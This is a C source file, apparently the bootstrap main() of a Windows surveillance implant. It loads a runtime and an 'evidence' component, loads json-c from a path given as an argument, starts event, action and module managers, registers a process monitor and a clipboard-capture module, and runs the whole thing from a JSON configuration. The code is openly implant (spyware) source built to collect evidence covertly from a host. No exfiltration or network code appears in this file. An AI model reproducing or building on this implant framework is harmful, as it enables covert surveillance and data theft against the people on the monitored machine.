#include "utils.h"
#include "eventmanager.h"
#include "actionmanager.h"
#include "modulemanager.h"
#include "monitor.h"

#include <stdio.h>

#include "..\Runtime\Runtime.h"
#include "modules_runtime_definitions.h"

/* events */
#include "..\Events\Events.h"

/* modules */
#include "..\Clipboard\clipboard.h"

//int main(int argc, char *argv[]);

int main(int argc, char *argv[])
{
	/*	implant bootstrap:
		
		1] load runtime
		2] load components 
		3] load events-actions engine
	
	*/

	/* 1] load runtime */
	PRUNTIME pRuntime = LoadRuntime();


	/* 2] load components */

	/* 2a] load events */
	EventsLoad(&pRuntime);

	/* 2b] load evidence */
	EvidenceLoad(&pRuntime);
	
	/* 3] load the engine */

	/* 3a] load json */
	//HMODULE hJsonC = LoadLibraryA("C:\\Users\\unknown\\stuff\\Lotus\\64bit\\Actproxy\\x64\\Release\\json-c.dll");

	HMODULE hJsonC = LoadLibraryA(argv[2]);

	fp_json_object_is_type = (JSON_OBJECT_IS_TYPE) GetProcAddress(hJsonC, "json_object_is_type");
	fp_json_object_object_get_ex = (JSON_OBJECT_OBJECT_GET_EX) GetProcAddress(hJsonC, "json_object_object_get_ex");
	fp_json_object_array_length = (JSON_OBJECT_ARRAY_LENGTH) GetProcAddress(hJsonC, "json_object_array_length");
	fp_json_object_get_boolean = (JSON_OBJECT_GET_BOOLEAN) GetProcAddress(hJsonC, "json_object_get_boolean");
	fp_json_object_get_int = (JSON_OBJECT_GET_INT) GetProcAddress(hJsonC, "json_object_get_int");
	fp_json_object_get_int64 = (JSON_OBJECT_GET_INT64) GetProcAddress(hJsonC, "json_object_get_int64");
	fp_json_object_get_double = (JSON_OBJECT_GET_DOUBLE) GetProcAddress(hJsonC, "json_object_get_double");
	fp_json_object_get_string = (JSON_OBJECT_GET_STRING) GetProcAddress(hJsonC, "json_object_get_string");
	fp_json_object_array_get_idx = (JSON_OBJECT_ARRAY_GET_IDX) GetProcAddress(hJsonC, "json_object_array_get_idx");
	fp_json_object_from_file = (JSON_OBJECT_FROM_FILE) GetProcAddress(hJsonC, "json_object_from_file");


	json_object *config = NULL;

	if (argc < 3)
	{
		OUTPUTDEBUG("not enough args\n");
		return -1;
	}

	/* 3b] load engine specific data */
	PMODULE_SPECIFIC_DATA pEventActionsEngineSpecificData = (PMODULE_SPECIFIC_DATA)malloc(sizeof(MODULE_SPECIFIC_DATA));
	pRuntime->pModuleSpecificData[INDEX_EVENTS_ACTIONS_ENGINE] = pEventActionsEngineSpecificData;

	PVARIABLES_EVENTSACTIONENGINE pVariablesEventsActionsEngine = (PVARIABLES_EVENTSACTIONENGINE)malloc(sizeof(VARIABLES_EVENTSACTIONENGINE));
	pRuntime->pModuleSpecificData[INDEX_EVENTS_ACTIONS_ENGINE]->lpVariables = pVariablesEventsActionsEngine;

	/* 3c] start the engine */
	em_init(pRuntime);
	am_init(pRuntime);
	mm_init(pRuntime);

	OUTPUTDEBUG("[MM] monitor\n");

	/* 3d] monitor registration */
	MONITOR_PROCESS_REGISTER(process_addwatch, process_delwatch);
	
	/* 3e] modules registration */
	MODULE_CLIPBOARD_REGISTER(ModuleClipboardMain, ModuleClipboardFlush);

	OUTPUTDEBUG("[MM] modules %s\n", argv[1]);

	/* 3f] parse config */
	config = fp_json_object_from_file(argv[1]);
	em_parseconfig(pRuntime, config);
	am_parseconfig(pRuntime, config);
	mm_parseconfig(pRuntime, config);

	/* 3g] go */
	am_createqueues(pRuntime);
	em_scheduleall(pRuntime);

	while (1) API_SLEEP(10);

	return 0;
}
